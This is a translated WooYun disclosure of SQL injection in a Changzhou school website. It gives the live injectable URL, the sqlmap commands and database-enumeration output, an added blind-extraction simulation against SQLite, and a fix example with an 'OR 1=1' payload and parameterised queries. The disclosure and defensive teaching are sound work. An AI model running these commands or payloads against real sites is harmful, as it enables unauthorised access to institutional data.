Vulnerability summary

Defect ID: wooyun-2014-059589

Title: SQL injection on an education-sector site (12 databases + a great many tables + sql-shell)

Vendor: 常州市教育科学研究院 (Changzhou Institute of Educational Science)

Author: Anonymous.L

Submitted: 2014-05-07 11:15

Fix deadline: 2014-06-21 11:15

Public disclosure: 2014-06-21 11:15

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2014-05-07: Details sent to the vendor, awaiting vendor handling
2014-05-10: Vendor confirmed; details visible to the vendor only
2014-05-20: Details disclosed to core white hats and domain experts
2014-05-30: Details disclosed to regular white hats
2014-06-09: Details disclosed to intern white hats
2014-06-21: Details disclosed to the public

Brief description:

A small education-sector school website with SQL injection. Official site: http://jfl.czedu.com.cn/
As they say: security has to start from a young age.

Detailed description:

Injection point URL: http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146
python ./sqlmap/sqlmap.py -u "http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146" --dbs --tables --sql-shell and so on. Screenshot first:

a.png


With the entry point in hand, carry on:
12 databases pulled down:
available databases [12]:
[*] chat
[*] flash
[*] flashtv
[*] information_schema
[*] jfltopxx
[*] mysql
[*] pt
[*] test
[*] upwebbook
[*] www1pt
[*] www1topxx
[*] wwwpt

b.png


Next come the tables of every kind: there are really too many, so I can only include a few screenshots here and paste some of the information alongside.

c.png


-------------------------

d.png


Too many; I hit Ctrl+C before it finished.
[22:34:28] [INFO] fetching tables
[22:34:28] [INFO] fetching number of tables for database 'information_schema'
[22:34:28] [INFO] retrieved: 28
[22:34:36] [INFO] retrieved: CHARACTER_SETS
[22:35:14] [INFO] retrieved: COLLATIONS
[22:35:48] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[22:36:59] [INFO] retrieved: COLUMNS
[22:37:15] [INFO] retrieved: COLUMN_PRIVILEGES
[22:37:44] [INFO] retrieved: ENGINES
[22:38:03] [INFO] retrieved: EVENTS
[22:38:11] [INFO] retrieved: FILES
[22:38:25] [INFO] retrieved: GLOBAL_STATUS
[22:38:55] [INFO] retrieved: GLOBAL_VARIABLES
[22:39:13] [INFO] retrieved: KEY_COLUMN_USAGE
[22:39:40] [INFO] retrieved: PARTITIONS
[22:40:06] [INFO] retrieved: PLUGINS
[22:40:15] [INFO] retrieved: PROCESSLIST
[22:40:39] [INFO] retrieved: PROFILING
[22:40:52] [INFO] retrieved: REFERENTIAL_CONSTRAINTS
[22:41:48] [INFO] retrieved: ROUTINES
[22:42:00] [INFO] retrieved: SCHEMATA
[22:42:18] [INFO] retrieved: SCHEMA_PRIVILEGES
[22:42:47] [INFO] retrieved: SESSION_STATUS
[22:43:20] [INFO] retrieved: SESSION_VARIABLES
[22:43:38] [INFO] retrieved: STATISTICS
[22:43:51] [INFO] retrieved: TABLES
[22:44:05] [INFO] retrieved: TABLE_CONSTRAINTS
[22:44:43] [INFO] retrieved: TABLE_PRIVILEGES
[22:45:08] [INFO] retrieved: TRIGGERS
[22:45:21] [INFO] retrieved: USER_PRIVILEGES
[22:45:59] [INFO] retrieved: VIEWS
[22:46:12] [INFO] fetching number of tables for database 'chat'
[22:46:12] [INFO] retrieved: 3
[22:46:13] [INFO] retrieved: chatsession
[22:46:37] [INFO] retrieved: message
[22:46:53] [INFO] retrieved: userlist
[22:47:05] [INFO] fetching number of tables for database 'flash'
[22:47:05] [INFO] retrieved: 2
[22:47:07] [INFO] retrieved: all_table
[22:47:20] [INFO] retrieved: menu
[22:47:25] [INFO] fetching number of tables for database 'flashtv'
[22:47:25] [INFO] retrieved: 4
[22:47:29] [INFO] retrieved: all_table
[22:47:42] [INFO] retrieved: menu
[22:47:54] [INFO] retrieved: pinglun
[22:48:15] [INFO] retrieved: user1
[22:48:28] [INFO] fetching number of tables for database 'jfltopxx'
[22:48:28] [INFO] retrieved: 15
[22:48:30] [INFO] retrieved: 2012zaosheng
[22:48:54] [INFO] retrieved: adip
[22:49:00] [INFO] retrieved: all_table
[22:49:18] [INFO] retrieved: banner
[22:49:27] [INFO] retrieved: djtj
[22:49:32] [INFO] retrieved: gg
[22:49:35] [INFO] retrieved: ip
[22:49:38] [INFO] retrieved: link
[22:49:47] [INFO] retrieved: ly
[22:49:49] [INFO] retrieved: menu
[22:49:55] [INFO] retrieved: pinglun
[22:50:10] [INFO] retrieved: techersms
[22:50:25] [INFO] retrieved: tp
[22:50:27] [INFO] retrieved: user1
[22:50:39] [INFO] retrieved: votes
[22:50:52] [INFO] fetching number of tables for database 'mysql'
[22:50:52] [INFO] retrieved: 25
[22:50:59] [INFO] retrieved: all_table
[22:51:19] [INFO] retrieved: all_tablepart
[22:51:30] [INFO] retrieved: all_tablepinglun
[22:51:49] [INFO] retrieved: columns_priv
[22:52:12] [INFO] retrieved: db
[22:52:15] [INFO] retrieved: event
[22:52:22] [INFO] retrieved: func
[22:52:36] [INFO] retrieved: general_log
[22:52:56] [INFO] retrieved: help_category
[22:53:15] [INFO] retrieved: help_keyword
[22:53:35] [INFO] retrieved: help_relation
[22:53:49] [INFO] retrieved: help_topic
[22:53:57] [INFO] retrieved: host
[22:54:01] [INFO] retrieved: ndb_binlog_index
[22:54:28] [INFO] retrieved: proc
[22:54:37] [INFO] retrieved: procs_priv
[22:54:49] [INFO] retrieved: servers
[22:54:58] [INFO] retrieved: slow_log
[22:55:19] [INFO] retrieved: tables_priv
[22:55:42] [INFO] retrieved: time_zone
[22:55:55] [INFO] retrieved: time_zone_leap_second
[22:56:20] [INFO] retrieved: time_zone_name
[22:56:38] [INFO] retrieved: time_zone_transition
[22:56:57] [INFO] retrieved: time_zone_transition_type
[22:57:09] [INFO] retrieved: user
[22:57:19] [INFO] fetching number of tables for database 'pt'
[22:57:19] [INFO] retrieved: 20
[22:57:25] [INFO] retrieved: adip
[22:57:35] [INFO] retrieved: all_table
[22:57:51] [INFO] retrieved: all_tablepart
[22:57:58] [INFO] retrieved: all_tablepinglun
[22:58:08] [INFO] retrieved: box_table
[22:58:21] [INFO] retrieved: boxpart
[22:58:29] [INFO] retrieved: diymb
[22:58:36] [INFO] retrieved: grjlm
[22:58:44] [INFO] retrieved: grly
[22:58:48] [INFO] retrieved: grphoto
[22:59:02] [INFO] retrieved: gryuru
[22:59:13] [INFO] retrieved: haoyou
[22:59:24] [INFO] retrieved: haoyouly
[22:59:28] [INFO] retrieved: links
[22:59:39] [INFO] retrieved: logolink
[22:59:48] [INFO] retrieved: perphotopart
[23:00:14] [INFO] retrieved: photopinglun
[23:00:45] [INFO] retrieved: pingyu
[23:00:54] [INFO] retrieved: sonuser
[23:01:03] [INFO] retrieved: user
[23:01:09] [INFO] fetching number of tables for database 'test'
[23:01:09] [INFO] retrieved: 0
[23:01:11] [WARNING] unable to retrieve the number of tables for database 'test'
[23:01:11] [INFO] fetching number of tables for database 'upwebbook'
[23:01:11] [INFO] retrieved: 14
[23:01:12] [INFO] retrieved: booknone
[23:01:52] [INFO] retrieved: bookpinglun
[23:02:39] [INFO] retrieved: bookrelation
[23:02:56] [INFO] retrieved: books
[23:03:00] [INFO] retrieved: bookus
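The sqlmap log above recovers every table name one character at a time, which is why a single name takes 20 to 60 seconds. The following is an added example, written by the editor and not taken from the report or from sqlmap, that reproduces that technique against a constructed in-memory SQLite stand-in for xwpd2.php. It assumes a boolean-blind oracle (the page does not say which injection technique sqlmap settled on), uses SQLite's sqlite_master and unicode()/substr() in place of MySQL's information_schema and ascii()/substring(), and the table names seeded into the stand-in are constructed to echo ones in the log; all function names are the editor's.

```python
import sqlite3

# Constructed stand-in for the vulnerable backend: an in-memory SQLite
# database with a few tables named after ones in the sqlmap log above.
# The real target runs MySQL; here sqlite_master plays the role of
# information_schema.tables and unicode()/substr()/length() replace
# MySQL's ascii()/substring()/length().
_db = sqlite3.connect(":memory:")
for _name in ("news", "menu", "user1", "pinglun"):
    _db.execute(f"CREATE TABLE {_name} (id INTEGER PRIMARY KEY, title TEXT)")
_db.execute("INSERT INTO news VALUES (14146, 'school notice')")
_db.commit()

_requests = 0


def vulnerable_page(id_param: str) -> bool:
    """Simulates xwpd2.php: the id value is concatenated into the query.
    Returns True when a record would be rendered, which is the one bit of
    information a boolean-blind injection extracts per request."""
    global _requests
    _requests += 1
    sql = "SELECT title FROM news WHERE id=" + id_param  # the injection point
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def request_count() -> int:
    """Number of simulated HTTP requests issued so far."""
    return _requests


def ask(condition: str) -> bool:
    """One blind request: id=14146 AND (<condition>) keeps the page's normal
    content only when the condition is true."""
    return vulnerable_page(f"14146 AND ({condition})")


def blind_int(expr: str, lo: int, hi: int) -> int:
    """Binary-search the integer value of a SQL expression known to lie in
    [lo, hi]; costs about log2(hi - lo) requests instead of hi - lo."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(expr: str, max_len: int = 64) -> str:
    """Recover a string-valued SQL expression one character at a time,
    bisecting each character over printable ASCII (about 7 requests each).
    This is the per-character pace visible in the sqlmap timestamps above."""
    length = blind_int(f"length({expr})", 0, max_len)
    return "".join(
        chr(blind_int(f"unicode(substr({expr}, {pos}, 1))", 32, 126))
        for pos in range(1, length + 1)
    )


def blind_table_names() -> list:
    """Enumerate table names the way sqlmap's --tables does under a blind
    injection: first the count, then each name by offset."""
    count = blind_int("(SELECT count(*) FROM sqlite_master WHERE type='table')", 0, 255)
    names = []
    for i in range(count):
        expr = (
            "(SELECT name FROM sqlite_master WHERE type='table' "
            f"ORDER BY name LIMIT 1 OFFSET {i})"
        )
        names.append(blind_string(expr))
    return names


if __name__ == "__main__":
    for name in blind_table_names():
        print("retrieved:", name)
    print("requests used:", request_count())
```

Four short table names cost well over a hundred requests here; against a real server each request is a round trip, which is the delay between consecutive "retrieved:" lines in the log. That request volume is also the detection opportunity: one client issuing hundreds of requests for the same id with varying AND clauses is a signature worth alerting on in the web server logs.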
Now let's see whether there is a sql-shell: sure enough there is.
D:\python2.7.6>python ./sqlmap/sqlmap.py -u "http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146" --sql-shell

e.png


Proof of vulnerability:

The detailed description already explains it clearly; for proof I'll just put the screenshots up:

a.png


Databases:
available databases [12]:
[*] chat
[*] flash
[*] flashtv
[*] information_schema
[*] jfltopxx
[*] mysql
[*] pt
[*] test
[*] upwebbook
[*] www1pt
[*] www1topxx
[*] wwwpt

b.png


All kinds of tables...
sql-shell:

e.png


Fix:

Filter the input: validate xxid and id as integers on the server side and pass them to the query as bound parameters rather than concatenating them into the SQL string.
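What "filter" should mean in practice, as an added example by the editor (not the report's or the site's code; the PHP source of xwpd2.php is not on the page): the vulnerable concatenation the report describes, beside a hardened handler that whitelists xxid and id as integers and binds them as parameters. It runs against a constructed SQLite table with constructed rows; the real backend is MySQL, and in PHP the equivalent of the hardened version is a mysqli or PDO prepared statement with the two values bound as integers.

```python
import re
import sqlite3

# Constructed stand-in for the site's news table (the real backend is MySQL;
# the same two patterns apply with mysqli/PDO prepared statements in PHP).
_db = sqlite3.connect(":memory:")
_db.execute(
    "CREATE TABLE news (id INTEGER PRIMARY KEY, xxid INTEGER, title TEXT, draft INTEGER)"
)
_db.executemany(
    "INSERT INTO news VALUES (?, ?, ?, ?)",
    [
        (14146, 62, "public notice", 0),
        (14147, 62, "unpublished draft", 1),
        (14148, 63, "other school's notice", 0),
    ],
)
_db.commit()


def fetch_vulnerable(xxid: str, id_: str) -> list:
    """Mirrors the flaw in xwpd2.php: both query-string values are pasted
    into the SQL text, so a crafted id rewrites the WHERE clause and the
    trailing draft=0 restriction is commented away."""
    sql = f"SELECT title FROM news WHERE xxid={xxid} AND id={id_} AND draft=0"
    return [row[0] for row in _db.execute(sql)]


_INT = re.compile(r"[0-9]{1,10}")


def fetch_safe(xxid: str, id_: str) -> list:
    """Hardened handler: whitelist the parameters as plain integers, then
    bind them so they are only ever compared as values, never parsed as
    SQL. Either layer alone stops this injection; keep both."""
    for value in (xxid, id_):
        if not _INT.fullmatch(value):
            raise ValueError(f"rejected non-integer parameter: {value!r}")
    sql = "SELECT title FROM news WHERE xxid=? AND id=? AND draft=0"
    return [row[0] for row in _db.execute(sql, (int(xxid), int(id_)))]


def rejects(xxid: str, id_: str) -> bool:
    """True if the hardened handler refuses the input."""
    try:
        fetch_safe(xxid, id_)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "14146 OR 1=1 --"
    print("vulnerable, normal :", fetch_vulnerable("62", "14146"))
    print("vulnerable, payload:", fetch_vulnerable("62", payload))
    print("safe, normal       :", fetch_safe("62", "14146"))
    print("safe, payload      :", "rejected" if rejects("62", payload) else "accepted")
```

The payload is deliberately the simplest one: it turns the WHERE clause into "xxid=62 AND id=14146 OR 1=1" and comments out the draft filter, so the unpublished row and another school's row both come back. The integer whitelist is what makes the bug impossible to reintroduce later by someone editing the query; the bound parameter is what makes it impossible even if the whitelist is removed.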

Copyright notice: when reposting, please credit the source as Anonymous.L@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-05-10 00:19

Vendor reply:

Latest status:

None yet